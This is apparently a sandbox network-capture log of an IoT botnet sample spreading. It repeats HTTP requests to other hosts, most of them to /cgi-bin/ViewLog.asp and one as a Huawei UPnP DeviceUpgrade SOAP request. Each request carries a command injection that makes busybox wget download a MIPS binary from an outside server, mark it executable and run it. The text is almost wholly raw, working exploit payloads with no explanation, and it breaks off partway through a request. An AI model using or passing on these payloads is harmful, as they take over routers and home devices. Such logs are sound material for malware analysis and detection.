                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:12.678169012 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:15.110059977 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:19.717870951 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:28.933470011 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:48.388675928 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:25.251279116 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              244192.168.2.144917431.136.18.2448080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:10.959367990 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:11.526199102 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:12.678170919 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:15.110054016 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:19.717880011 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:28.933476925 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:48.388672113 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:25.251243114 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              245192.168.2.1454822156.198.243.12337215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:11.722954988 CET886OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:11.987804890 CET236INHTTP/1.1 500 Internal Server Error
                                              Content-Type: text/xml; charset="utf-8"
                                              Server: Linux UPnP/1.0 Huawei-ATP-IGD
                                              EXT:
                                              Connection: Keep-Alive
                                              Content-Length: 398


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              246192.168.2.144086694.120.175.748080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:11.791208982 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              247192.168.2.144812262.192.241.628080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:14.291368008 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              248192.168.2.143838685.122.222.878080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:14.513099909 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:15.654042006 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              249192.168.2.143351094.187.114.2288080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:14.515255928 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              250192.168.2.145545094.120.218.428080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:14.523546934 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              251192.168.2.146040031.200.44.338080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:14.535088062 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              252192.168.2.143365495.86.96.1138080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:14.980748892 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              253192.168.2.144990031.136.72.348080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:15.264045954 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:18.437915087 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
